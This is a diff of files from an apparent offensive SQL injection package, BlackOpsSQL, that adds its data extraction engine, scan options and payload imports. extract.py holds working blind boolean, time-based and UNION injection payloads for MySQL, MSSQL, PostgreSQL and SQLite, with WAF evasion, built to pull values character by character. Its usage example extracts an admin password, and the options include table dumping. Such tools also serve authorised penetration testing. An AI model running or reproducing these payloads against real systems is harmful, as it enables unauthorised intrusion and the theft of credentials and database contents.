blackops-sql 0.1.6__py3-none-any.whl

blackopssql/engine/_scanner/extract.py

@@ -0,0 +1,302 @@
+# SPDX-License-Identifier: AGPL-3.0-or-later
+# Copyright (c) 2026 CommonHuman-Lab
+"""
+BlackOpsSQL — engine/_scanner/extract.py
+Blind data extraction using SUBSTRING-based boolean queries.
+
+This module implements character-by-character data extraction over a
+confirmed boolean-blind or time-blind SQLi vector.
+
+Approach (binary search over ASCII ordinal):
+  For each character position 1..max_len:
+    1. Use a boolean-blind query: ASCII(SUBSTRING(expr, pos, 1)) > mid
+    2. Binary search narrows the ordinal range from [32, 126] to a single
+       printable ASCII character in at most 7 requests.
+    3. If the character ordinal is < 32 (non-printable) or > 126, stop
+       extraction — we've hit the end of the string.
+
+Supported extraction contexts:
+  - Boolean-blind: uses _test_boolean_condition() which reuses the active.py
+    _fetch + _diff_score machinery.
+  - Time-blind: uses _test_time_condition() via blind.py _timed_fetch.
+
+Usage:
+  result = extract_value(
+      expr="(SELECT password FROM users WHERE username='admin' LIMIT 1)",
+      surface=surface, evasions=evasions, opts=opts,
+      injector=injector, baseline=baseline,
+      mode="boolean",   # or "time"
+  )
+  # result is a string like "s3cr3t!" or "" on failure
+"""
+
+from __future__ import annotations
+
+import time
+from typing import Any, Dict, List, Optional
+
+import re as _re
+
+from blackops_payloads.sqli import get_extraction_targets  # noqa: F401 (re-exported)
+from ..log import get_logger
+from ..http.injector import Injector
+from ..http.waf_detect import EVASION_NONE
+from .options import ScanOptions
+from .payloads import apply_evasion
+from .active import _fetch, _diff_score, _len_ratio
+from .blind import _timed_fetch
+
+logger = get_logger("blackopssql.extract")
+
+# Printable ASCII range (space=32 .. tilde=126)
+_ASCII_MIN = 32
+_ASCII_MAX = 126
+
+# Stop extraction when we see this many consecutive non-printable / null chars
+_MAX_NONPRINT_STREAK = 2
+
+# Maximum characters to extract per expression (safety cap)
+_MAX_EXTRACT_LEN = 256
+
+# Diff score threshold: same as active.py boolean likely threshold
+_DIFF_THRESHOLD = 0.10
+_LEN_RATIO_THRESHOLD = 0.02
+
+
+def extract_value(
+    expr: str,
+    surface: Dict[str, Any],
+    evasions: List[str],
+    opts: ScanOptions,
+    injector: Injector,
+    baseline: str,
+    mode: str = "boolean",
+) -> str:
+    """
+    Extract the string result of SQL *expr* character by character.
+
+    *mode* must be ``"boolean"`` (uses response diff) or ``"time"``
+    (uses response timing).  Returns the extracted string, which may be
+    empty if extraction fails.
+    """
+    dbms = opts.dbms
+    evasion = evasions[0] if evasions else EVASION_NONE
+
+    substr_fn = "SUBSTR" if dbms in ("sqlite", "oracle") else "SUBSTRING"
+    ord_fn = "ASCII"
+
+    url        = surface["url"]
+    method     = surface["method"]
+    params     = surface["params"]
+    param      = surface["single_param"]
+    json_body  = surface.get("json_body", False)
+    path_index = surface.get("path_index", 0)
+    second_url = getattr(opts, "second_url", "")
+
+    result_chars: List[str] = []
+    nonprint_streak = 0
+
+    for pos in range(1, _MAX_EXTRACT_LEN + 1):
+        ordinal = _binary_search_char(
+            expr=expr,
+            pos=pos,
+            substr_fn=substr_fn,
+            ord_fn=ord_fn,
+            surface=surface,
+            evasion=evasion,
+            opts=opts,
+            injector=injector,
+            baseline=baseline,
+            mode=mode,
+        )
+        if ordinal is None:
+            # Could not determine the character — extraction stalled
+            logger.debug("extract_value: stalled at pos=%d", pos)
+            break
+        if ordinal < _ASCII_MIN or ordinal > _ASCII_MAX:
+            nonprint_streak += 1
+            if nonprint_streak >= _MAX_NONPRINT_STREAK:
+                break
+            continue
+
+        nonprint_streak = 0
+        ch = chr(ordinal)
+        result_chars.append(ch)
+
+    return "".join(result_chars)
+
+
+def _binary_search_char(
+    expr: str,
+    pos: int,
+    substr_fn: str,
+    ord_fn: str,
+    surface: Dict[str, Any],
+    evasion: str,
+    opts: ScanOptions,
+    injector: Injector,
+    baseline: str,
+    mode: str,
+) -> Optional[int]:
+    """
+    Binary-search the ASCII ordinal of the character at *pos* in the result
+    of SQL *expr*.
+
+    Returns the ordinal integer (0–127) or None if the boolean signal is
+    unreliable / the DB returned NULL / end of string.
+    """
+    url        = surface["url"]
+    method     = surface["method"]
+    params     = surface["params"]
+    param      = surface["single_param"]
+    json_body  = surface.get("json_body", False)
+    path_index = surface.get("path_index", 0)
+    second_url = getattr(opts, "second_url", "")
+
+    lo, hi = 0, _ASCII_MAX + 1  # lo=0 so ASCII('')=0 converges to ordinal 1 (end-of-string)
+
+    while lo + 1 < hi:
+        mid = (lo + hi) // 2
+
+        if mode == "time":
+            # Time-blind: if condition is true, the delay fires.
+            # Use per-DBMS conditional sleep syntax.
+            delay = opts.time_threshold
+            _dbms = (opts.dbms or "auto").lower()
+            if _dbms in ("postgres", "postgresql"):
+                # PostgreSQL: CASE WHEN cond THEN pg_sleep(n) END
+                time_true_pl = (
+                    f"' AND (CASE WHEN ({ord_fn}({substr_fn}(({expr}),{pos},1))>{mid})"
+                    f" THEN (SELECT 1 FROM pg_sleep({delay})) ELSE 1 END)=1-- -"
+                )
+            elif _dbms == "mssql":
+                # MSSQL: WAITFOR DELAY cannot appear inside a SELECT subquery
+                time_true_pl = (
+                    f"'; IF ({ord_fn}({substr_fn}(({expr}),{pos},1))>{mid})"
+                    f" WAITFOR DELAY '0:0:{delay}'-- -"
+                )
+            elif _dbms == "sqlite":
+                # SQLite: randomblob-based busy loop to induce delay when condition is true
+                time_true_pl = (
+                    f"' AND (CASE WHEN ({ord_fn}({substr_fn}(({expr}),{pos},1))>{mid})"
+                    f" THEN (SELECT COUNT(*) FROM (WITH RECURSIVE r(x) AS"
+                    f" (SELECT 1 UNION ALL SELECT x+1 FROM r WHERE x<1000000) SELECT x FROM r)) ELSE 1 END)=1-- -"
+                )
+            else:
+                # MySQL / MariaDB / auto: OR scalar subquery avoids the missing-row issue of time-based conditions
+                time_true_pl = (
+                    f"' OR (SELECT IF({ord_fn}({substr_fn}(({expr}),{pos},1))>{mid}"
+                    f",SLEEP({delay}),0))-- -"
+                )
+            time_true_pl = apply_evasion(time_true_pl, evasion)
+            elapsed = _timed_fetch(
+                injector, url, method, params, param, time_true_pl,
+                second_url=second_url, json_body=json_body, path_index=path_index,
+            )
+            if elapsed is None:
+                return None
+            condition_true = elapsed >= opts.time_threshold
+        else:
+            # Boolean-blind: OR-based single probe compared against baseline.
+            probe_payload = f"' OR {ord_fn}({substr_fn}(({expr}),{pos},1))>{mid}-- -"
+            probe_pl = apply_evasion(probe_payload, evasion)
+
+            resp_probe = _fetch(injector, url, method, params, param, probe_pl,
+                                second_url=second_url, json_body=json_body,
+                                path_index=path_index)
+            if resp_probe is None:
+                return None
+
+            score = _diff_score(resp_probe, baseline)
+            len_r = _len_ratio(resp_probe, baseline)
+            condition_true = score >= _DIFF_THRESHOLD or len_r >= _LEN_RATIO_THRESHOLD
+
+        if condition_true:
+            lo = mid   # ordinal > mid, so search upper half
+        else:
+            hi = mid   # ordinal <= mid, so search lower half
+
+    ordinal = lo + 1
+    if ordinal < _ASCII_MIN or ordinal > _ASCII_MAX:
+        return ordinal  # caller handles out-of-range (end of string / NULL)
+    return ordinal
+
+
+_UNION_PREFIX = "BSQL_OUT_"
+_UNION_SUFFIX = "_BSQL_END"
+_MARKER_RE    = _re.compile(r"'BreachSQL_[^']*'")
+
+
+def extract_via_union(
+    expr: str,
+    union_finding,
+    surface: Dict[str, Any],
+    evasions: List[str],
+    opts: ScanOptions,
+    injector: Injector,
+) -> str:
+    """
+    Extract a single SQL expression using a confirmed UNION injection.
+    One request per expression — no binary search needed.
+    """
+    evasion = evasions[0] if evasions else EVASION_NONE
+    dbms    = (opts.dbms or "auto").lower()
+
+    if dbms in ("sqlite", "postgres", "postgresql", "oracle"):
+        cast   = f"CAST(({expr}) AS TEXT)"
+        concat = f"'{_UNION_PREFIX}'||{cast}||'{_UNION_SUFFIX}'"
+        concat_candidates = [concat]
+    elif dbms == "mssql":
+        cast   = f"CAST(({expr}) AS NVARCHAR(MAX))"
+        concat = f"'{_UNION_PREFIX}'+{cast}+'{_UNION_SUFFIX}'"
+        concat_candidates = [concat]
+    elif dbms == "auto":
+        # Try pipe concat first (SQLite / PostgreSQL / Oracle), then CONCAT (MySQL / MariaDB)
+        cast_text = f"CAST(({expr}) AS TEXT)"
+        cast_char = f"CAST(({expr}) AS CHAR)"
+        concat_candidates = [
+            f"'{_UNION_PREFIX}'||{cast_text}||'{_UNION_SUFFIX}'",
+            f"CONCAT('{_UNION_PREFIX}',{cast_char},'{_UNION_SUFFIX}')",
+        ]
+    else:
+        cast   = f"CAST(({expr}) AS CHAR)"
+        concat = f"CONCAT('{_UNION_PREFIX}',{cast},'{_UNION_SUFFIX}')"
+        concat_candidates = [concat]
+
+    url        = surface["url"]
+    method     = surface["method"]
+    params     = surface["params"]
+    param      = surface["single_param"]
+    json_body  = surface.get("json_body", False)
+    path_index = surface.get("path_index", 0)
+    second_url = getattr(opts, "second_url", "")
+
+    _pat = _re.compile(
+        _re.escape(_UNION_PREFIX) + r"(.*?)" + _re.escape(_UNION_SUFFIX),
+        _re.DOTALL,
+    )
+
+    for concat in concat_candidates:
+        new_payload = _MARKER_RE.sub(concat, union_finding.payload, count=1)
+        if new_payload == union_finding.payload:
+            return ""
+
+        new_payload = apply_evasion(new_payload, evasion)
+        resp = _fetch(injector, url, method, params, param, new_payload,
+                      second_url=second_url, json_body=json_body, path_index=path_index)
+        if not resp:
+            continue
+
+        # Search tag-stripped text.  Skip matches where UNION+SELECT appear in the
+        # 200 chars before BSQL_OUT_ — that signals a reflected-payload echo (e.g.
+        # "Results for: ...UNION SELECT...'BSQL_OUT_'||expr||'_BSQL_END',...") rather
+        # than actual SQL output.
+        text_content = _re.sub(r"<[^>]+>", "", resp)
+        clean_lower = text_content.lower()
+        for m in _pat.finditer(text_content):
+            before = clean_lower[max(0, m.start() - 200):m.start()]
+            if "union" in before and "select" in before:
+                continue
+            return m.group(1)
+
+    return ""

blackopssql/engine/_scanner/options.py

@@ -0,0 +1,96 @@
+# SPDX-License-Identifier: AGPL-3.0-or-later
+# Copyright (c) 2026 CommonHuman-Lab
+"""Scan configuration for BlackOpsSQL."""
+
+from __future__ import annotations
+
+import warnings
+from typing import Any
+
+_VALID_TECHNIQUE_CHARS = frozenset("EBTUSO")
+
+
+class ScanOptions:
+    def __init__(
+        self,
+        # Shared
+        crawl:            bool              = False,
+        data:             str               = "",
+        headers:          dict[str, str] | None = None,
+        cookies:          str               = "",
+        proxy:            str               = "",
+        threads:          int               = 5,
+        timeout:          int               = 15,
+        level:            int               = 1,
+        max_pages:        int               = 100,
+        max_depth:        int               = 3,
+        delay:            float             = 0.0,
+        output:           str               = "",
+        exclude_patterns: list[Any] | None  = None,
+        # SQLi-specific
+        dbms:             str               = "auto",   # auto|mysql|mssql|postgres|sqlite
+        technique:        str               = "EBTUO",  # E B T U O
+        oob_callback:     str               = "",
+        time_threshold:   int               = 4,        # seconds
+        risk:             int               = 1,        # 1-3
+        second_url:       str               = "",       # read response from different URL
+        max_union_cols:   int               = 20,       # max columns to probe in UNION detection
+        path_params:      list[str] | None  = None,     # path segment names to inject
+        cookie_params:    list[str] | None  = None,     # cookie names to inject into
+        header_params:    list[str] | None  = None,     # HTTP header names to inject into
+        exploit:          bool              = False,     # extract version/user/db/tables after scan
+        dump:             str               = "",        # table name to dump rows from
+        dump_all:         bool              = False,     # dump every discovered table
+    ) -> None:
+        # Shared
+        self.crawl            = crawl
+        self.data             = data.strip()
+        self.headers          = headers or {}
+        self.cookies          = cookies.strip()
+        self.proxy            = proxy.strip()
+        self.threads          = max(1, min(threads, 20))
+        self.timeout          = max(5, min(timeout, 120))
+        self.level            = max(1, min(level, 3))
+        self.max_pages        = max_pages
+        self.max_depth        = max_depth
+        self.delay            = max(0.0, delay)
+        self.output           = output.strip()
+        self.exclude_patterns: list[Any] = exclude_patterns or []
+        # SQLi-specific
+        self.dbms             = dbms.lower().strip()
+        technique_upper = technique.upper()
+        unknown_chars = set(technique_upper) - _VALID_TECHNIQUE_CHARS
+        if unknown_chars:
+            warnings.warn(
+                f"Unknown technique letter(s) ignored: {''.join(sorted(unknown_chars))}. "
+                f"Valid letters are: E B T U S O",
+                UserWarning,
+                stacklevel=2,
+            )
+        # Keep only valid letters, preserving the original order
+        self.technique        = "".join(c for c in technique_upper if c in _VALID_TECHNIQUE_CHARS)
+        self.oob_callback     = oob_callback.strip()
+        self.time_threshold   = max(1, min(time_threshold, 30))
+        self.risk             = max(1, min(risk, 3))
+        self.second_url       = second_url.strip()  # if set, read responses from here
+        self.max_union_cols   = max(1, min(max_union_cols, 100))
+        self.path_params      = path_params or []
+        self.cookie_params    = cookie_params or []
+        self.header_params    = header_params or []
+        self.exploit          = exploit
+        self.dump             = dump.strip()
+        self.dump_all         = dump_all
+
+    # Convenience: check which techniques are enabled
+    @property
+    def use_error(self)   -> bool: return "E" in self.technique
+    @property
+    def use_boolean(self) -> bool: return "B" in self.technique
+    @property
+    def use_time(self)    -> bool: return "T" in self.technique
+    @property
+    def use_union(self)   -> bool: return "U" in self.technique
+    @property
+    def use_stacked(self) -> bool: return "S" in self.technique
+    @property
+    def use_oob(self)     -> bool: return "O" in self.technique and bool(self.oob_callback)

blackopssql/engine/_scanner/passive.py

@@ -0,0 +1,86 @@
+# SPDX-License-Identifier: AGPL-3.0-or-later
+# Copyright (c) 2026 CommonHuman-Lab
+"""
+BlackOpsSQL — engine/_scanner/passive.py
+Fetch the seed page and run passive header/config checks.
+"""
+
+from __future__ import annotations
+
+from typing import Optional
+
+import requests
+
+from ..log import get_logger
+from ..http.injector import Injector
+from ..reporter import ScanResult
+
+logger = get_logger("blackopssql.passive")
+
+
+def fetch_seed(injector: Injector, url: str) -> Optional[requests.Response]:
+    """Fetch the target URL once for passive checks and DOM source."""
+    try:
+        resp = injector.get(url)
+        logger.debug("Seed fetch %s → %d (%d bytes)", url, resp.status_code, len(resp.text))
+        return resp
+    except Exception as exc:
+        logger.warning("Seed fetch failed for %s: %s", url, exc)
+        return None
+
+
+def run_passive_checks(
+    url: str,
+    seed_resp: Optional[requests.Response],
+    injector: Injector,
+    result: ScanResult,
+) -> None:
+    """
+    Lightweight passive checks relevant to SQLi context.
+    Currently checks for verbose error disclosure in the default response
+    and notes interesting headers (X-Powered-By, Server) for DBMS hints.
+    """
+    if seed_resp is None:
+        return
+
+    _check_error_disclosure(url, seed_resp, result)
+    _check_interesting_headers(url, seed_resp, result)
+
+
+def _check_error_disclosure(url: str, resp, result: ScanResult) -> None:
+    """Log a warning if the default response already contains a DB error."""
+    from .active import _detect_db_error  # avoid circular import at module level
+    dbms, evidence = _detect_db_error(resp.text)
+    if dbms:
+        msg = f"Passive: DB error visible in default response [{dbms}] — {evidence[:80]}"
+        logger.warning(msg)
+        result.append_log(msg)
+
+
+def _check_interesting_headers(url: str, resp, result: ScanResult) -> None:
+    """Log headers that hint at the backend technology / DBMS."""
+    interesting = {
+        "x-powered-by": "tech hint",
+        "server":        "server hint",
+        "x-aspnet-version": "ASP.NET — likely MSSQL",
+        "x-aspnetmvc-version": "ASP.NET MVC — likely MSSQL",
+    }
+    for hdr, note in interesting.items():
+        val = resp.headers.get(hdr, "")
+        if val:
+            msg = f"Passive header [{hdr}: {val}] ({note})"
+            logger.debug(msg)
+            result.append_log(msg)
+            # Auto-hint DBMS — only set when the header gives a strong signal
+            if result.dbms_detected is None:
+                val_lower = val.lower()
+                hdr_lower = hdr.lower()
+                if "mysql" in val_lower or "mariadb" in val_lower:
+                    result.dbms_detected = "mysql"
+                elif (
+                    "asp" in val_lower or "iis" in val_lower or "mssql" in val_lower
+                    or hdr_lower in ("x-aspnet-version", "x-aspnetmvc-version")
+                ):
+                    result.dbms_detected = "mssql"
+                elif "postgres" in val_lower or "pgsql" in val_lower:
+                    result.dbms_detected = "postgres"

blackopssql/engine/_scanner/payloads/__init__.py

@@ -0,0 +1,80 @@
+# SPDX-License-Identifier: AGPL-3.0-or-later
+# Copyright (c) 2026 CommonHuman-Lab
+"""BlackOpsSQL — SQL injection payloads"""
+
+from blackops_payloads.sqli import (
+    ERROR_PAYLOADS,
+    DB_ERROR_PATTERNS,
+    get_error_payloads,
+    BOOLEAN_PAIRS,
+    BOOLEAN_PAIRS_RISK2,
+    get_boolean_pairs,
+    TIME_PAYLOADS,
+    get_time_payloads,
+    CONCAT_PAYLOADS,
+    SUBSTRING_PROBES,
+    make_marker,
+    get_concat_payloads,
+    get_substring_probes,
+    make_substring_payload,
+    order_by_probes,
+    union_null_probes,
+    OOB_PAYLOADS,
+    get_oob_payloads,
+    DB_CONTENTS_PAYLOADS,
+    get_db_contents_payloads,
+    STACKED_PAYLOADS,
+    get_stacked_payloads,
+    DIOS_PAYLOADS,
+    get_dios_payloads,
+    LFI_PAYLOADS,
+    get_lfi_payloads,
+    PRIVESC_PAYLOADS,
+    get_privesc_payloads,
+    ENUM_PAYLOADS,
+    get_enum_payloads,
+)
+from blackops_payloads.sqli.union import BREACH_MARKER_PREFIX
+from blackops_payloads.encoders import apply_evasion
+
+__all__ = [
+    # error
+    "ERROR_PAYLOADS",
+    "DB_ERROR_PATTERNS",
+    "get_error_payloads",
+    # boolean
+    "BOOLEAN_PAIRS",
+    "BOOLEAN_PAIRS_RISK2",
+    "get_boolean_pairs",
+    # time
+    "TIME_PAYLOADS",
+    "get_time_payloads",
+    # union / markers
+    "BREACH_MARKER_PREFIX",
+    "make_marker",
+    "CONCAT_PAYLOADS",
+    "SUBSTRING_PROBES",
+    "get_concat_payloads",
+    "get_substring_probes",
+    "make_substring_payload",
+    "order_by_probes",
+    "union_null_probes",
+    # oob
+    "OOB_PAYLOADS",
+    "get_oob_payloads",
+    # advanced
+    "DB_CONTENTS_PAYLOADS",
+    "get_db_contents_payloads",
+    "STACKED_PAYLOADS",
+    "get_stacked_payloads",
+    "DIOS_PAYLOADS",
+    "get_dios_payloads",
+    "LFI_PAYLOADS",
+    "get_lfi_payloads",
+    "PRIVESC_PAYLOADS",
+    "get_privesc_payloads",
+    "ENUM_PAYLOADS",
+    "get_enum_payloads",
+    # evasion
+    "apply_evasion",
+]